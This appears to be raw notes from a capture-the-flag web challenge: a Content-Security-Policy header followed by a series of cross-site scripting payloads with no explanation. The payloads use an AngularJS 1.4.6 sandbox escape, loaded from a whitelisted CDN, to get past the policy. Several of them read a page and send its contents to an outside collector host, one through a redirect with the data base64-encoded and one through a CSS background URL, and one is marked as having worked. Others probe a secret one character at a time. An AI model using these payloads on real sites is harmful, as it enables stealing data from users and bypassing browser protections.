Content-Security-Policy
	default-src 'self';script-src 'self' 'unsafe-eval' https://cdnjs.cloudflare.com/;style-src 'self' 'unsafe-inline' https://unpkg.com/nes.css/ https://fonts.googleapis.com/;font-src 'self' https://fonts.gstatic.com/;img-src 'self' data:;child-src 'none';object-src 'none'

<iframe srcdoc="<script>alert(1)</script>"></iframe>



# this worked on the CTF
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };var z=new XMLHttpRequest();z.onreadystatechange=function(){if (z.responseText) location="http://coyote.requestcatcher.com/?a="+btoa(unescape(encodeURIComponent(z.responseText)))};z.open("GET","/alien",false);z.send();//');}} </div>


<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} </div>


working to post:
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };var z=new XMLHttpRequest();z.onreadystatechange=function(){ if (z.responseText) { var y = new XMLHttpRequest(); y.open("POST", "/api/submit", false);y.setRequestHeader("Content-type", "application/json");y.send(JSON.stringify({feedback: z.responseText.substring(754,781)})); } };z.open("GET","/alien",false);z.send();alert(1)//');}} </div>


<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };var z=new XMLHttpRequest();z.onreadystatechange=function(){ if (z.responseText) { document.write("<style>td { background: #000 url(\"http://coyote.requestcatcher.com/test\" + z.responseText.substring(754,781) + ") }") repeat top center;</style>"); } };z.open("GET","/alien",false);z.send();alert(1)//');}} </div>

index 754-781


document.write("<style>td { background: #000 url(\"http://coyote.requestcatcher.com/test\" + z.responseText.substring(754,781) + ") }") repeat top center;</style>")








<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };var z=new XMLHttpRequest();z.onreadystatechange=function(){ if (z.responseText) { flag = z.responseText.substring(754,781); if (flag.charAt(0) > 'N') alert(1); } };z.open("GET","/alien",false);z.send();//');}} </div>

<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };var z=new XMLHttpRequest();z.onreadystatechange=function(){ if (z.responseText) { var flag = z.responseText.substring(754,781); if (flag.charAt(0) < 'N') alert(1); } };z.open("GET","/alien",false);z.send();//');}} </div>


flag = z.responseText.substring(754,781); if (flag.charAt(0) > 'N') alert(1);


"asfd".charAt(2) > 'f'



<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };throw "asdf"//');}} </div>